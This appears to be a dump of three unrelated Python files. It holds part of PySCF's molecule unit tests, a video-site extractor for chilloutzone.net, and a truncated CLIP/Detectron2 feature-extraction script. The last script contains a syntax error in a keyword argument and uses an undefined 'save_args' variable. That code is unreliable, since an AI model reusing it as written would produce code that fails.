[2s,1p]\n H S\n 2.9412494 -0.09996723\n 0.6834831 0.39951283\n 0.2222899 0.70011547\n H S\n 2.9412494 0.15591627\n 0.6834831 0.60768372\n 0.2222899 0.39195739\n ''', optimize=True),\n 'O': 'unc-ccpvdz',\n 'H2': gto.load('sto-3g', 'He') # or use basis of another atom\n }\n )\n self.assertEqual(mol.nao_nr(), 29)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = {'H': ['sto3g', '''unc\n C S\n 71.6168370 0.15432897\n 13.0450960 0.53532814\n 3.5305122 0.44463454\n C SP\n 2.9412494 -0.09996723 0.15591627\n 0.6834831 0.39951283 0.60768372\n 0.2222899 0.70011547 0.39195739\n '''],\n 'O': mol.expand_etbs([(0, 4, 1.5, 2.2), # s-function\n (1, 2, 0.5, 2.2)]) # p-function\n }\n )\n self.assertEqual(mol.nao_nr(), 42)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = ('sto3g', 'ccpvdz', '3-21g',\n gto.etbs([(0, 4, 1.5, 2.2), (1, 2, 0.5, 2.2)]),\n [[0, numpy.array([1e3, 1.])]])\n )\n self.assertEqual(mol.nao_nr(), 77)\n\n mol.atom = 'Hg'\n mol.basis = 'ccpvdz'\n self.assertRaises(RuntimeError, mol.build)\n\n def test_default_basis(self):\n mol = gto.M(atom=[['h' , 0,1,1], [\"O1\", (0.,0.,0.)], [1, 1.,1.,0.],],\n basis={'default':'321g', 'O1': 'sto3g'})\n self.assertEqual(sorted(mol._basis.keys()), ['H', 'O1'])\n\n def test_parse_pople_basis(self):\n self.assertEqual(len(gto.basis.load('6-31G(d)' , 'H')), 2)\n self.assertEqual(len(gto.basis.load('6-31G(d)' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31Gs' , 'C')), 6)\n 
self.assertEqual(len(gto.basis.load('6-31G*' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31G(d,p)' , 'H')), 3)\n self.assertEqual(len(gto.basis.load('6-31G(d,p)' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31G(2d,2p)' , 'H')), 4)\n self.assertEqual(len(gto.basis.load('6-31G(2d,2p)' , 'C')), 7)\n self.assertEqual(len(gto.basis.load('6-31G(3df,3pd)', 'H')), 6)\n self.assertEqual(len(gto.basis.load('6-31G(3df,3pd)', 'C')), 9)\n\n def test_parse_basis(self):\n mol = gto.M(atom='''\n 6 0 0 -0.5\n 8 0 0 0.5\n 1 1 0 -1.0\n 1 -1 0 -1.0''',\n basis='''\n#BASIS SET: (3s) -> [2s]\nH S\n 5.4471780 0.1562849787 \n 0.82454724 0.9046908767 \nH S\n 0.18319158 1.0000000 \n#BASIS SET: (6s,3p) -> [3s,2p]\nC S\n 172.2560000 0.0617669 \n 25.9109000 0.3587940 \n 5.5333500 0.7007130 \nC SP\n 3.6649800 -0.3958970 0.2364600 \n 0.7705450 1.2158400 0.8606190 \nC SP\n 0.1958570 1.0000000 1.0000000 \n#BASIS SET: (6s,3p) -> [3s,2p]\nO S\n 322.0370000 0.0592394 \n 48.4308000 0.3515000 \n 10.4206000 0.7076580 \nO SP\n 7.4029400 -0.4044530 0.2445860 \n 1.5762000 1.2215600 0.8539550 \nO SP\n 0.3736840 1.0000000 1.0000000 \n''')\n self.assertTrue(mol.nao_nr() == 22)\n\n def test_ghost(self):\n mol = gto.M(\n atom = 'C 0 0 0; ghost 0 0 2',\n basis = {'C': 'sto3g', 'ghost': gto.basis.load('sto3g', 'H')}\n )\n self.assertEqual(mol.nao_nr(), 6)\n\n mol = gto.M(atom='''\n ghost-O 0.000000000 0.000000000 2.500000000\n X_H -0.663641000 -0.383071000 3.095377000\n ghost.H 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''',\n basis='631g')\n self.assertEqual(mol.nao_nr(), 26)\n\n def test_nucmod(self):\n gto.filatov_nuc_mod(80)\n self.assertEqual(gto.mole._parse_nuc_mod(1), gto.NUC_GAUSS)\n self.assertEqual(gto.mole._parse_nuc_mod('Gaussian'), gto.NUC_GAUSS)\n mol1 = gto.Mole()\n mol1.atom = mol0.atom\n mol1.nucmod = 'G'\n mol1.verbose = 5\n mol1.nucprop = {'H': {'mass': 3}}\n mol1.output = '/dev/null'\n mol1.build(False, False)\n mol1.set_nuc_mod(0, 2)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_GAUSS)\n self.assertAlmostEqual(mol1._env[mol1._atm[0,gto.PTR_ZETA]], 2, 9)\n self.assertAlmostEqual(mol1._env[mol1._atm[1,gto.PTR_ZETA]], 586314366.54656982, 4)\n\n mol1.set_nuc_mod(1, 0)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_POINT)\n\n mol1.nucmod = None\n mol1.build(False, False)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_POINT)\n\n mol1.nucmod = {'H': gto.filatov_nuc_mod}\n mol1.build(False, False)\n self.assertTrue(mol1._atm[0,gto.NUC_MOD_OF] == gto.NUC_GAUSS)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_POINT)\n self.assertTrue(mol1._atm[2,gto.NUC_MOD_OF] == gto.NUC_GAUSS)\n\n def test_zmat(self):\n coord = numpy.array((\n (0.200000000000, -1.889726124565, 0.000000000000),\n (1.300000000000, -1.889726124565, 0.000000000000),\n (2.400000000000, -1.889726124565, 0.000000000000),\n (3.500000000000, -1.889726124565, 0.000000000000),\n (0.000000000000, 0.000000000000, -1.889726124565),\n (0.000000000000, 1.889726124565, 0.000000000000),\n (0.200000000000, -0.800000000000, 0.000000000000),\n (1.889726124565, 0.000000000000, 1.133835674739)))\n zstr0 = gto.cart2zmat(coord)\n zstr = '\\n'.join(['H '+x for x in zstr0.splitlines()])\n atoms = gto.zmat2cart(zstr)\n zstr1 = gto.cart2zmat([x[1] for x in atoms])\n self.assertTrue(zstr0 == zstr1)\n\n numpy.random.seed(1)\n coord = numpy.random.random((6,3))\n zstr0 = gto.cart2zmat(coord)\n zstr = '\\n'.join(['H '+x 
for x in zstr0.splitlines()])\n atoms = gto.zmat2cart(zstr)\n zstr1 = gto.cart2zmat([x[1] for x in atoms])\n self.assertTrue(zstr0 == zstr1)\n\n def test_c2s(self): # Transformation of cart <-> sph, sph <-> spinor\n c = mol0.sph2spinor_coeff()\n s0 = mol0.intor('int1e_ovlp_spinor')\n s1 = mol0.intor('int1e_ovlp_sph')\n sa = reduce(numpy.dot, (c[0].T.conj(), s1, c[0]))\n sa+= reduce(numpy.dot, (c[1].T.conj(), s1, c[1]))\n mol0.cart = True\n s2 = mol0.intor('int1e_ovlp')\n mol0.cart = False\n self.assertAlmostEqual(abs(s0 - sa).max(), 0, 12)\n c = mol0.cart2sph_coeff()\n sa = reduce(numpy.dot, (c.T.conj(), s2, c))\n self.assertAlmostEqual(abs(s1 - sa).max(), 0, 12)\n\n c0 = gto.mole.cart2sph(1)\n ca, cb = gto.mole.cart2spinor_l(1)\n ua, ub = gto.mole.sph2spinor_l(1)\n self.assertAlmostEqual(abs(c0.dot(ua)-ca).max(), 0, 9)\n self.assertAlmostEqual(abs(c0.dot(ub)-cb).max(), 0, 9)\n\n c0 = gto.mole.cart2sph(0, normalized='sp')\n ca, cb = gto.mole.cart2spinor_kappa(-1, 0, normalized='sp')\n ua, ub = gto.mole.sph2spinor_kappa(-1, 0)\n self.assertAlmostEqual(abs(c0.dot(ua)-ca).max(), 0, 9)\n self.assertAlmostEqual(abs(c0.dot(ub)-cb).max(), 0, 9)\n\n c1 = gto.mole.cart2sph(0, numpy.eye(1))\n self.assertAlmostEqual(abs(c0*0.282094791773878143-c1).max(), 0, 12)\n\n c0 = gto.mole.cart2sph(1, normalized='sp')\n ca, cb = gto.mole.cart2spinor_kappa(1, 1, normalized='sp')\n ua, ub = gto.mole.sph2spinor_kappa(1, 1)\n self.assertAlmostEqual(abs(c0.dot(ua)-ca).max(), 0, 9)\n self.assertAlmostEqual(abs(c0.dot(ub)-cb).max(), 0, 9)\n\n c1 = gto.mole.cart2sph(1, numpy.eye(3).T)\n self.assertAlmostEqual(abs(c0*0.488602511902919921-c1).max(), 0, 12)\n\n def test_bas_method(self):\n self.assertEqual([mol0.bas_len_cart(x) for x in range(mol0.nbas)],\n [1, 3, 1, 1, 1, 1, 1, 3, 3, 3, 6, 6, 1, 3])\n self.assertEqual([mol0.bas_len_spinor(x) for x in range(mol0.nbas)],\n [2, 4, 2, 2, 2, 2, 2, 6, 6, 6, 10, 10, 2, 4])\n c0 = mol0.bas_ctr_coeff(0)\n self.assertAlmostEqual(abs(c0[:,0]/c0[0,0] - (1,3,1)).max(), 0, 9)\n self.assertAlmostEqual(abs(c0[:,1] - (0,1,0)).max(), 0, 9)\n\n self.assertRaises(ValueError, mol0.gto_norm, -1, 1.)\n\n def test_nelectron(self):\n mol0.nelectron = mol0.nelectron\n mol0.nelectron = mol0.nelectron\n mol0.spin = 2\n self.assertRaises(RuntimeError, lambda *args: mol0.nelec)\n mol0.spin = 1\n\n mol1 = copy.copy(mol0)\n self.assertEqual(mol1.nelec, (5, 4))\n mol1.nelec = (3, 6)\n self.assertEqual(mol1.nelec, (3, 6))\n\n def test_multiplicity(self):\n mol1 = copy.copy(mol0)\n self.assertEqual(mol1.multiplicity, 2)\n mol1.multiplicity = 5\n self.assertEqual(mol1.multiplicity, 5)\n self.assertEqual(mol1.spin, 4)\n self.assertRaises(RuntimeError, lambda:mol1.nelec)\n\n def test_ms(self):\n mol1 = copy.copy(mol0)\n self.assertEqual(mol1.ms, 0.5)\n mol1.ms = 1\n self.assertEqual(mol1.multiplicity, 3)\n self.assertEqual(mol1.spin, 2)\n self.assertRaises(RuntimeError, lambda:mol1.nelec)\n\n def test_atom_method(self):\n aoslice = mol0.aoslice_by_atom()\n for i in range(mol0.natm):\n symb = mol0.atom_pure_symbol(i)\n shls = mol0.atom_shell_ids(i)\n nshls = aoslice[i][1] - aoslice[i][0]\n self.assertEqual(shls[0], aoslice[i][0])\n self.assertEqual(len(shls), nshls)\n self.assertEqual(mol0.atom_nshells(i), nshls)\n aoslice = mol0.aoslice_2c_by_atom()\n self.assertEqual([x[2] for x in aoslice], [0, 8, 56])\n self.assertEqual([x[3] for x in aoslice], [8, 56, 64])\n\n def test_dump_loads(self):\n import json\n tmpfile = tempfile.NamedTemporaryFile()\n lib.chkfile.save_mol(mol0, tmpfile.name)\n mol1 = 
gto.Mole()\n mol1.update(tmpfile.name)\n self.assertEqual(json.loads(mol1.dumps()), json.loads(mol0.dumps()))\n tmpfile = None\n mol1.loads(mol1.dumps())\n mol1.loads_(mol0.dumps())\n mol1.unpack(mol1.pack())\n mol1.unpack_(mol0.pack())\n\n def test_set_geom(self):\n mol1 = gto.Mole()\n mol1.verbose = 5\n mol1.set_geom_(mol0._atom, 'B', symmetry=True)\n mol1.set_geom_(mol0.atom_coords(), 'B', inplace=False)\n\n mol1.symmetry = False\n mol1.set_geom_(mol0.atom_coords(), 'B')\n mol1.set_geom_(mol0.atom_coords(), inplace=False)\n mol1.set_geom_(mol0.atom_coords(), unit=1.)\n mol1.set_geom_(mol0.atom_coords(), unit='Ang', inplace=False)\n\n def test_apply(self):\n from pyscf import scf, mp\n self.assertTrue(isinstance(mol0.apply('RHF'), scf.rohf.ROHF))\n self.assertTrue(isinstance(mol0.apply('MP2'), mp.ump2.UMP2))\n self.assertTrue(isinstance(mol0.apply(scf.RHF), scf.rohf.ROHF))\n self.assertTrue(isinstance(mol0.apply(scf.uhf.UHF), scf.uhf.UHF))\n\n def test_with_MoleContext(self):\n mol1 = mol0.copy()\n with mol1.with_rinv_as_nucleus(1):\n self.assertTrue(mol1._env[gto.PTR_RINV_ZETA] != 0)\n self.assertAlmostEqual(abs(mol1._env[gto.PTR_RINV_ORIG+2]), 0.46288647587915266, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ZETA], 0, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 0, 9)\n with mol1.with_rinv_as_nucleus(0):\n self.assertAlmostEqual(abs(mol1._env[gto.PTR_RINV_ORIG+2]), 1.8515459035166109, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 0, 9)\n\n with mol1.with_rinv_zeta(20):\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ZETA], 20, 9)\n mol1.set_rinv_zeta(3.)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ZETA], 0, 9)\n\n with mol1.with_rinv_origin((1,2,3)):\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 3, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 0, 9)\n\n with mol1.with_range_coulomb(20):\n self.assertAlmostEqual(mol1._env[gto.PTR_RANGE_OMEGA], 20, 9)\n mol1.set_range_coulomb(2.)\n self.assertAlmostEqual(mol1._env[gto.PTR_RANGE_OMEGA], 0, 9)\n\n with mol1.with_common_origin((1,2,3)):\n self.assertAlmostEqual(mol1._env[gto.PTR_COMMON_ORIG+2], 3, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_COMMON_ORIG+2], 0, 9)\n\n mol1.set_f12_zeta(2.)\n\n def test_input_symmetry(self):\n mol1 = gto.Mole()\n mol1.atom = 'H 1 1 1; H -1 -1 1; H 1 -1 -1; H -1 1 -1'\n mol1.unit = 'B'\n mol1.symmetry = True\n mol1.verbose = 5\n mol1.output = '/dev/null'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 4.2517312170868475, 9)\n\n mol1 = gto.Mole()\n mol1 = gto.Mole()\n mol1.atom = 'H 0 0 -1; H 0 0 1'\n mol1.cart = True\n mol1.unit = 'B'\n mol1.symmetry = 'Dooh'\n mol1.verbose = 5\n mol1.output = '/dev/null'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 0.69980902201036865, 9)\n\n mol1 = gto.Mole()\n mol1.atom = 'H 0 -1 0; H 0 1 0'\n mol1.unit = 'B'\n mol1.symmetry = True\n mol1.symmetry_subgroup = 'D2h'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 0.69980902201036865, 9)\n\n mol1.atom = 'H 0 0 -1; H 0 0 1'\n mol1.unit = 'B'\n mol1.symmetry = 'Coov'\n mol1.symmetry_subgroup = 'C2'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 0.69980902201036865, 9)\n\n mol1.atom = 'H 1 0 -1; H 0 0 1'\n mol1.symmetry = 'Coov'\n self.assertRaises(RuntimeWarning, mol1.build)\n\n mol1.atom = '''\n C 0. 0. 0.7264\n C 0. 0. -.7264\n H 0.92419 0. 1.29252\n H -.92419 0. 1.29252\n H 0. 0.92419 -1.29252\n H 0. 
-.92419 -1.29252'''\n mol1.symmetry = True\n mol1.symmetry_subgroup = 'C2v'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), -0.5215310671099358, 9)\n\n def test_search_ao_label(self):\n mol1 = mol0.copy()\n mol1.atom = mol0.atom + ['Mg 1,1,1']\n mol1.ecp['Mg'] = 'lanl2dz'\n mol1.basis['Mg'] = 'lanl2dz'\n mol1.build(0, 0)\n self.assertEqual(list(mol1.search_ao_label('O.*2p')), [10,11,12])\n self.assertEqual(list(mol1.search_ao_label('O1 2p')), [10,11,12])\n self.assertEqual(list(mol1.search_ao_label(['O.*2p','0 H 1s'])), [0, 10,11,12])\n self.assertEqual(list(mol1.search_ao_label([10,11,12])), [10,11,12])\n self.assertEqual(list(mol1.search_ao_label(lambda x: '4d' in x)), [24,25,26,27,28])\n mol1.ao_labels(fmt='%s%s%s%s')\n mol1.sph_labels(fmt=None)\n mol1.cart = True\n self.assertEqual(list(mol1.search_ao_label('4d')), [25,26,27,28,29,30])\n mol1.ao_labels(fmt='%s%s%s%s')\n mol1.ao_labels(fmt=None)\n mol1.cart = False\n mol1.spinor_labels()\n mol1.spinor_labels(fmt='%s%s%s%s')\n mol1.spinor_labels(fmt=None)\n\n def test_input_ecp(self):\n mol1 = gto.Mole()\n mol1.atom = mol0.atom\n mol1.ecp = 'lanl2dz'\n mol1.build(False, False)\n gto.basis.load_ecp('lanl08', 'O')\n gto.format_ecp({'O':'lanl08', 1:'lanl2dz'})\n self.assertRaises(KeyError, gto.format_ecp, {'H':'lan2ldz'})\n\n def test_condense_to_shell(self):\n mol1 = mol0.copy()\n mol1.symmetry = False\n mol1.build(False, False)\n v = gto.condense_to_shell(mol1, mol1.intor('int1e_ovlp'), numpy.max)\n self.assertAlmostEqual(lib.finger(v), 5.7342530154117846, 9)\n\n def test_input_ghost_atom(self):\n mol = gto.M(\n atom = 'C 0 0 0; ghost 0 0 2',\n basis = {'C': 'sto3g', 'ghost': gto.basis.load('sto3g', 'H')}\n )\n\n mol = gto.M(atom='''\n ghost1 0.000000000 0.000000000 2.500000000\n ghost2 -0.663641000 -0.383071000 3.095377000\n ghost2 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''',\n basis={'ghost1':gto.basis.load('sto3g', 'O'),\n 'ghost2':gto.basis.load('631g', 'H'),\n 'O':'631g', 'H':'631g'}\n )\n\n mol = gto.M(atom='''\n ghost-O 0.000000000 0.000000000 2.500000000\n ghost_H -0.663641000 -0.383071000 3.095377000\n ghost:H 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''', basis='631g')\n\n mol = gto.M(atom='''\n X1 0.000000000 0.000000000 2.500000000\n X2 -0.663641000 -0.383071000 3.095377000\n X2 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''',\n basis={'X1':gto.basis.load('sto3g', 'O'),\n 'X2':gto.basis.load('631g', 'H'),\n 'O':'631g', 'H':'631g'}\n )\n\n mol = gto.M(atom='''\n X-O 0.000000000 0.000000000 2.500000000\n X_H1 -0.663641000 -0.383071000 3.095377000\n X:H 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''', basis='631g')\n\n def test_conc_mole(self):\n mol1 = gto.M(atom='Mg', ecp='LANL2DZ', basis='lanl2dz')\n mol2 = mol1 + mol0\n self.assertEqual(mol2.natm, 4)\n self.assertEqual(mol2.nbas, 18)\n self.assertEqual(mol2.nao_nr(), 42)\n mol2 = mol0 + mol1\n self.assertEqual(mol2.natm, 4)\n self.assertEqual(mol2.nbas, 18)\n self.assertEqual(mol2.nao_nr(), 42)\n n0 = mol0.npgto_nr()\n n1 = mol1.npgto_nr()\n self.assertEqual(mol2.npgto_nr(), n0+n1)\n mol2 = 
mol2 + mol2\n mol2.cart = True\n self.assertEqual(mol2.npgto_nr(), 100)\n\n def test_intor_cross(self):\n mol1 = gto.M(atom='He', basis={'He': [(2,(1.,1))]}, cart=True)\n s0 = gto.intor_cross('int1e_ovlp', mol1, mol0)\n self.assertEqual(s0.shape, (6, 34))\n s0 = gto.intor_cross('int1e_ovlp', mol0, mol1)\n self.assertEqual(s0.shape, (34, 6))\n s0 = gto.intor_cross('int1e_ovlp_cart', mol0, mol1)\n self.assertEqual(s0.shape, (36, 6))\n\n def test_energy_nuc(self):\n self.assertAlmostEqual(mol0.get_enuc(), 6.3611415029455705, 9)\n self.assertAlmostEqual(gto.M().energy_nuc(), 0, 9)\n\n def test_fakemol(self):\n numpy.random.seed(1)\n coords = numpy.random.random((6,3))*4\n vref = 0\n mol = mol0.copy()\n for c in coords:\n mol.set_rinv_origin(c)\n vref += mol.intor('int1e_rinv')\n\n fakemol = gto.fakemol_for_charges(coords)\n pmol = mol + fakemol\n shls_slice = (0, mol.nbas, 0, mol.nbas, mol.nbas, pmol.nbas)\n v = pmol.intor('int3c2e', comp=1, shls_slice=shls_slice)\n v = numpy.einsum('pqk->pq', v)\n self.assertAlmostEqual(abs(vref-v).max(), 0, 12)\n\n def test_to_uncontracted_cartesian_basis(self):\n pmol, ctr_coeff = mol0.to_uncontracted_cartesian_basis()\n c = scipy.linalg.block_diag(*ctr_coeff)\n s = reduce(numpy.dot, (c.T, pmol.intor('int1e_ovlp'), c))\n self.assertAlmostEqual(abs(s-mol0.intor('int1e_ovlp')).max(), 0, 9)\n\n mol0.cart = True\n pmol, ctr_coeff = mol0.to_uncontracted_cartesian_basis()\n c = scipy.linalg.block_diag(*ctr_coeff)\n s = reduce(numpy.dot, (c.T, pmol.intor('int1e_ovlp'), c))\n self.assertAlmostEqual(abs(s-mol0.intor('int1e_ovlp')).max(), 0, 9)\n mol0.cart = False\n\n\nif __name__ == \"__main__\":\n print(\"test mole.py\")\n unittest.main()\n"} {"ext": "py", "sha": "1a2f77c4eb3883d36294dbe9e2921e5aaa2e7656", "content": "import json\n\nfrom .common import InfoExtractor\nfrom .youtube import YoutubeIE\nfrom ..compat import compat_b64decode\nfrom ..utils import (\n clean_html,\n ExtractorError\n)\n\n\nclass ChilloutzoneIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?chilloutzone\\.net/video/(?P[\\w|-]+)\\.html'\n _TESTS = [{\n 'url': 'http://www.chilloutzone.net/video/enemene-meck-alle-katzen-weg.html',\n 'md5': 'a76f3457e813ea0037e5244f509e66d1',\n 'info_dict': {\n 'id': 'enemene-meck-alle-katzen-weg',\n 'ext': 'mp4',\n 'title': 'Enemene Meck - Alle Katzen weg',\n 'description': 'Ist das der Umkehrschluss des Niesenden Panda-Babys?',\n },\n }, {\n 'note': 'Video hosted at YouTube',\n 'url': 'http://www.chilloutzone.net/video/eine-sekunde-bevor.html',\n 'info_dict': {\n 'id': '1YVQaAgHyRU',\n 'ext': 'mp4',\n 'title': '16 Photos Taken 1 Second Before Disaster',\n 'description': 'md5:58a8fcf6a459fe0a08f54140f0ad1814',\n 'uploader': 'BuzzFeedVideo',\n 'uploader_id': 'BuzzFeedVideo',\n 'upload_date': '20131105',\n },\n }, {\n 'note': 'Video hosted at Vimeo',\n 'url': 'http://www.chilloutzone.net/video/icon-blending.html',\n 'md5': '2645c678b8dc4fefcc0e1b60db18dac1',\n 'info_dict': {\n 'id': '85523671',\n 'ext': 'mp4',\n 'title': 'The Sunday Times - Icons',\n 'description': 're:(?s)^Watch the making of - makingoficons.com.{300,}',\n 'uploader': 'Us',\n 'uploader_id': 'usfilms',\n 'upload_date': '20140131'\n },\n }]\n\n def _real_extract(self, url):\n mobj = self._match_valid_url(url)\n video_id = mobj.group('id')\n\n webpage = self._download_webpage(url, video_id)\n\n base64_video_info = self._html_search_regex(\n r'var cozVidData = \"(.+?)\";', webpage, 'video data')\n decoded_video_info = compat_b64decode(base64_video_info).decode('utf-8')\n video_info_dict = 
json.loads(decoded_video_info)\n\n # get video information from dict\n video_url = video_info_dict['mediaUrl']\n description = clean_html(video_info_dict.get('description'))\n title = video_info_dict['title']\n native_platform = video_info_dict['nativePlatform']\n native_video_id = video_info_dict['nativeVideoId']\n source_priority = video_info_dict['sourcePriority']\n\n # If nativePlatform is None a fallback mechanism is used (i.e. youtube embed)\n if native_platform is None:\n youtube_url = YoutubeIE._extract_url(webpage)\n if youtube_url:\n return self.url_result(youtube_url, ie=YoutubeIE.ie_key())\n\n # Non Fallback: Decide to use native source (e.g. youtube or vimeo) or\n # the own CDN\n if source_priority == 'native':\n if native_platform == 'youtube':\n return self.url_result(native_video_id, ie='Youtube')\n if native_platform == 'vimeo':\n return self.url_result(\n 'http://vimeo.com/' + native_video_id, ie='Vimeo')\n\n if not video_url:\n raise ExtractorError('No video found')\n\n return {\n 'id': video_id,\n 'url': video_url,\n 'ext': 'mp4',\n 'title': title,\n 'description': description,\n }\n"} {"ext": "py", "sha": "1a2f77e0bf0fac1106bb1d67ddd967a8c53e35f8", "content": "#!/usr/bin/env python3\n\n\"\"\"\nGrid features extraction script.\n\"\"\"\nimport argparse\nimport os\nimport torch\nimport tqdm\nfrom fvcore.common.file_io import PathManager\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.engine import default_setup\nfrom detectron2.evaluation import inference_context\nfrom detectron2.modeling import build_model\nimport numpy as np\nfrom clip.clip import load\nimport torch.nn as nn\nfrom torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize\n\nfrom grid_feats import (\n add_attribute_config,\n build_detection_test_loader_with_attributes,\n)\nfrom timm.models.vision_transformer import resize_pos_embed\nimport timm\n\n# A simple mapper from object detection dataset to VQA dataset names\ndataset_to_folder_mapper = {}\ndataset_to_folder_mapper['coco_2014_train'] = 'train2014'\ndataset_to_folder_mapper['coco_2014_val'] = 'val2014'\ndataset_to_folder_mapper['coco_2014_val'] = 'trainval2014'\ndataset_to_folder_mapper['coco_2014_train'] = 'trainval2014'\n# One may need to change the Detectron2 code to support coco_2015_test\n# insert \"coco_2015_test\": (\"coco/test2015\", \"coco/annotations/image_info_test2015.json\"),\n# at: https://github.com/facebookresearch/detectron2/blob/master/detectron2/data/datasets/builtin.py#L36\ndataset_to_folder_mapper['coco_2015_test'] = 'test2015'\ndataset_to_folder_mapper['coco_2015_test-dev'] = 'test-dev2015'\n\n\ndef extract_grid_feature_argument_parser():\n parser = argparse.ArgumentParser(description=\"Grid feature extraction\")\n parser.add_argument(\"--config-file\", default=\"\", metavar=\"FILE\", help=\"path to config file\")\n parser.add_argument(\"--dataset\", help=\"name of the dataset\", default=\"coco_2014_train\",\n choices=['coco_2014_train', 'coco_2014_val', 'coco_2015_test', 'coco_2015_test-dev'])\n parser.add_argument('--model_type', default='RN50', type=str, help='RN50, RN101, RN50x4, ViT-B/32, vit_base_patch32_224_in21k')\n\n parser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n )\n return parser\n\ndef extract_grid_feature_on_dataset(model, data_loader, dump_folder):\n for idx, inputs in enumerate(tqdm.tqdm(data_loader)):\n with torch.no_grad():\n image_id = 
inputs[0]['image_id']\n file_name = '%d.pth' % image_id\n # compute features\n images = model.preprocess_image(inputs)\n features = model.backbone(images.tensor)\n outputs = model.roi_heads.get_conv5_features(features)\n # modify the filename\n file_name = inputs[0]['file_name'].split(\"/\")[-1].replace(\"jpg\", \"npy\")\n outputs = outputs.permute(0, 2, 3, 1)\n\n with PathManager.open(os.path.join(dump_folder, file_name), \"wb\") as f:\n # save as CPU tensors\n np.save(f, outputs.cpu().numpy())\n\ndef do_feature_extraction(cfg, model, dataset_name, args):\n with inference_context(model):\n dump_folder = os.path.join(cfg.OUTPUT_DIR, \"features\", dataset_to_folder_mapper[dataset_name])\n PathManager.mkdirs(dump_folder)\n data_loader = build_detection_test_loader_with_attributes(cfg, dataset_name, args.model_type='clip')\n extract_clip_feature_on_dataset(model, data_loader, dump_folder, args)\n\ndef setup(args):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n cfg = get_cfg()\n add_attribute_config(cfg)\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # force the final residual block to have dilations 1\n cfg.MODEL.RESNETS.RES5_DILATION = 1\n cfg.freeze()\n default_setup(cfg, args)\n return cfg\n\ndef extract_clip_feature_on_dataset(model, data_loader, dump_folder, args):\n if args.model_type != 'vit_base_patch32_224_in21k':\n save_args.model_type = args.model_type.split(\"-\")[0]\n mean = torch.Tensor([0.48145466, 0.4578275, 0.40821073]).to(\"cuda\").reshape(3, 1, 1)\n std = torch.Tensor([0.26862954, 0.26130258, 0.27577711]).to(\"cuda\").reshape(3, 1, 1)\n dump_folder = f\"clip/{save_args.model_type}/\" + dump_folder.split(\"/\")[-1]\n else:\n save_args.model_type = 'vit_base'\n mean = torch.Tensor([0.5, 0.5, 0.5]).to(\"cuda\").reshape(3, 1, 1)\n std = torch.Tensor([0.5, 0.5, 0.5]).to(\"cuda\").reshape(3, 1, 1)\n dump_folder = f\"clip/{save_args.model_type}/\" + dump_folder.split(\"/\")[-1]\n print(model.pos_embed.shape)\n num_patches = 558 #600 * 1000 // 32 // 32\n print(num_patches)\n pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, 768, device='cuda'),)\n pos_embed.weight = resize_pos_embed(model.pos_embed, pos_embed)\n model.pos_embed = pos_embed\n\n if args.model_type == \"ViT-B/32\":\n num_patches = 558 #600 * 1000 // 32 // 32\n print(num_patches)\n pos_embed = nn.Parameter(torch.zeros(num_patches + 1, 768, device='cuda'),)\n pos_embed.weight = resize_pos_embed(model.visual.positional_embedding.unsqueeze(0), pos_embed.unsqueeze(0))\n model.visual.positional_embedding = pos_embed\n \n\n if not os.path.exists(dump_folder):\n os.makedirs(dump_folder)\n for idx, inputs in enumerate(tqdm.tqdm(data_loader)):\n with torch.no_grad():\n image_id = inputs[0]['image_id']\n file_name = inputs[0]['file_name'].split(\"/\")[-1].replace(\"jpg\", \"npy\")\n # compute features\n image = inputs[0]['image'].to(\"cuda\").float() / 255.0\n \n image = (image - mean) / std\n image = image.unsqueeze(0)\n if \"RN\" in args.model_type:\n outputs = model.encode_image(image)\n elif args.model_type == 'vit_base_patch32_224_in21k':\n outputs = model(image)\n else:\n x = model.visual.conv1(image.half()) # shape = [*, width, grid, grid]\n x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid 